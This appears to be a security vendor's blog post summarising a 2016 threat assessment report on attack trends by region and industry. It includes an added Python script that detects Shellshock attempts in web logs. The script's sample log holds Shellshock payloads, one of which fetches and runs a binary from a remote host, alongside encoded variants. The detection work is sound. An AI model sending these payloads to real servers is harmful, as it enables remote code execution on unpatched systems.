Periodically, Fortinet publishes a set of findings based on threat intelligence gathered from hundreds of Cyber Threat Assessments we have performed across the globe. This report provides analysis and insight into the threats we’ve experienced within certain industry segments and regions.
Published just this week, the most recent report includes some interesting trends that every security professional ought to be reviewing in order to keep ahead of the ever-shifting threat landscape.
Unprecedented Attack Volumes
The Fortinet Cyber Threat Assessment Program (CTAP) recorded over 185 million threat events and incidents. Surprisingly, in spite of an increased focus on security by many organizations, most of these attacks still managed to slip past traditional perimeter defenses and onto the internal network, which is where the Fortinet assessment devices were located. That placement has a silver lining: because the data reflects only what got through, it gives a more accurate picture of the kinds of threats and techniques that actually penetrate organizations. Much of that intelligence is reflected in this quarter's report.
The More Things Change, The More They Stay The Same
In spite of massive campaigns to get users not to click on email links or attachments from senders they don't know, email-based attacks continue to succeed. One of the most interesting facts gleaned from this quarter's Fortinet CTAP Report is that email carrying infected attachments, or links leading to malicious content, remains the primary method of delivering malware to organizations. The next most common attack vector was malicious websites hosting infected content, reached through normal web browsing.
In spite of the high-profile growth of ransomware and newer, more sophisticated attacks, we continue to document a steady increase in the volume and velocity of attempted attacks delivered through email. This also means that far too many organizations have still not installed, or have not properly implemented, adequate email security countermeasures.
Attackers traditionally target unpatched devices, and that is not set to change anytime soon. In fact, the most common exploit attempt recorded globally targeted the Bash (Bourne-Again Shell) vulnerability commonly known as Shellshock, which was disclosed in 2014. We also saw a large number of Heartbleed attacks aimed at the well-documented OpenSSL vulnerability, disclosed the same year.
A growing attack vector we are tracking is unpatched secondary vulnerabilities: flaws in the libraries and auxiliary software embedded in open systems (OpenSSL bundled inside an appliance is the classic case). For some of these we recorded some of the highest numbers of attempted exploits we have seen, across many industries. The reason seems to be that attackers understand that patching a vulnerability in a library or auxiliary component is harder than patching the primary application, because the same component is bundled into many products and is often not tracked by the organization's patch process. So, far too often, it doesn't get done.
We also recorded a large number of attacks against commonly used open source software and network services, such as OpenBSD and DNS. Additionally, attackers are enhancing these older attacks with new techniques designed to bypass perimeter security defenses and escape detection, for example by encoding or obfuscating a well-known exploit payload so that a signature written for the original form no longer matches.
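The Shellshock finding above is a reminder that a two-year-old vulnerability is still worth hunting for in your own telemetry. The following is an added example, not code from the report or from Fortinet: it scans web server access logs for Shellshock (CVE-2014-6271 family) exploit attempts. It assumes the Apache "combined" log format and uses constructed sample lines, not real traffic. The detection logic rests on how the bug worked: a vulnerable bash treated any environment variable whose value began with `() {` as a function definition and executed whatever followed the closing brace, and CGI servers copy request headers and parts of the request line into the environment (HTTP_USER_AGENT, HTTP_REFERER, PATH_INFO, and so on), so that prefix turning up in a header or path is the signature. Fields are percent-decoded before matching so that encoded variants, one of the evasion techniques mentioned above, are not missed.

```python
"""Detect Shellshock (CVE-2014-6271 family) exploit attempts in web access logs.

Added example; assumes Apache "combined" log format. Sample lines below are
constructed for illustration and are not real traffic.
"""
import re
from urllib.parse import unquote

# Constructed sample log (not real traffic). Line 1 carries the payload in the
# User-Agent, line 2 in the Referer (an obfuscated variant in the style of the
# later CVE-2014-6277/6278 bugs), line 3 percent-encoded in PATH_INFO, and
# line 4 is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2016:13:55:36 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'wget http://198.51.100.9/x -O /tmp/x; chmod +x /tmp/x; /tmp/x'"
203.0.113.8 - - [10/Oct/2016:13:56:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 128 "() { _; } >_[$($())] { echo vulnerable; }" "Mozilla/5.0"
198.51.100.22 - - [10/Oct/2016:13:57:12 +0000] "GET /cgi-bin/env.cgi/%28%29%20%7B%20%3A%3B%7D%3B%20id HTTP/1.1" 200 90 "-" "curl/7.47.0"
192.0.2.15 - - [10/Oct/2016:13:58:40 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

# Apache "combined" format, one request per line. Double quotes inside a
# field are escaped by Apache as \" and are not handled by this simple regex.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<request>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The function-definition prefix a vulnerable bash looked for. Whitespace is
# allowed to vary so that trivial spacing tricks are still caught.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Request fields that a CGI server exports into the script's environment.
FIELDS = ("request", "referer", "ua")


def find_shellshock_attempts(log_text):
    """Return one (source_ip, field, payload_snippet) tuple per matching field.

    Percent-decoding happens before matching: the server decodes PATH_INFO
    before exporting it, and a log scan should flag attempts regardless of
    whether a particular server would have decoded the payload.
    """
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these
        for field in FIELDS:
            value = unquote(m.group(field))
            hit = SHELLSHOCK_RE.search(value)
            if hit:
                snippet = value[hit.start():hit.start() + 60]
                findings.append((m.group("ip"), field, snippet))
    return findings


def count_by_source(findings):
    """Aggregate findings per source IP, the view a SOC analyst triages first."""
    counts = {}
    for ip, _field, _snippet in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    hits = find_shellshock_attempts(SAMPLE_LOG)
    for ip, field, snippet in hits:
        print(f"{ip:15} {field:8} {snippet}")
    print(count_by_source(hits))
```

The 2014 signature is short, so expect some noise from legitimate shell snippets in query strings; pair the match with the target path (`/cgi-bin/` and similar) and with the response status before escalating, and treat any hit against a host that still runs an unpatched bash as an incident rather than an attempt.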
Customized Attacks by Region and Industry
Interestingly, we documented that each geographic region has its own unique challenges. North America had the most application vulnerability attacks (more than 40,000 incidents per day). LATAM had the highest peer-to-peer application usage in the world, and the H-worm botnet was far and away the dominant malware detected there. In EMEA, the top challenge was the Conficker worm. And Asia-Pacific led all regions in malware and botnets detected, which may correlate with its also ranking first in malicious websites visited per day.
We have also documented that attackers are being more selective about the sorts of attacks they use depending on the market segment of the organization they have targeted.
- In spite of the high-profile ransomware attacks we have all been reading about, Healthcare organizations were actually hit primarily by attacks targeting the Heartbleed vulnerability, along with remote code execution malware and denial-of-service attacks.
- Recently, it is the Financial Industry that has been hit hardest by ransomware, in far greater numbers than we have observed in other industries. However, we also continue to see a number of older attacks making a comeback against this industry, as well as other markets, with those attacks modified to escape detection.
- The Education Sector was targeted by attacks aimed at open source vulnerabilities, leading us to infer that patching isn't as high a priority for many schools. We also documented a high number of web-application and client-side attacks.
- And finally, the Technology Sector saw an increase in attacks aimed at common enterprise software packages from companies like Adobe and Microsoft.
This quarter’s report also provides some critical guidance on what to do about the threats we have documented. They include:
- Segment and monitor your network: flat networks offer little resistance to an attacker who has already gotten past the perimeter
- Control access more tightly, giving users and systems only the access they actually need
- Regularly audit your security posture
- Rules are changing, so stay aware of the regulatory requirements in your region and industry
- Train your staff on how to limit their exposure to threats
The quarterly threat landscape report provides a wealth of timely threat analysis and security intelligence. Combined with Fortinet's weekly Threat Intelligence Brief, available by subscription, it provides essential information to help keep today's security professionals apprised of the latest threats targeting their networks.
The 2016 Fortinet CTAP Report is available for download.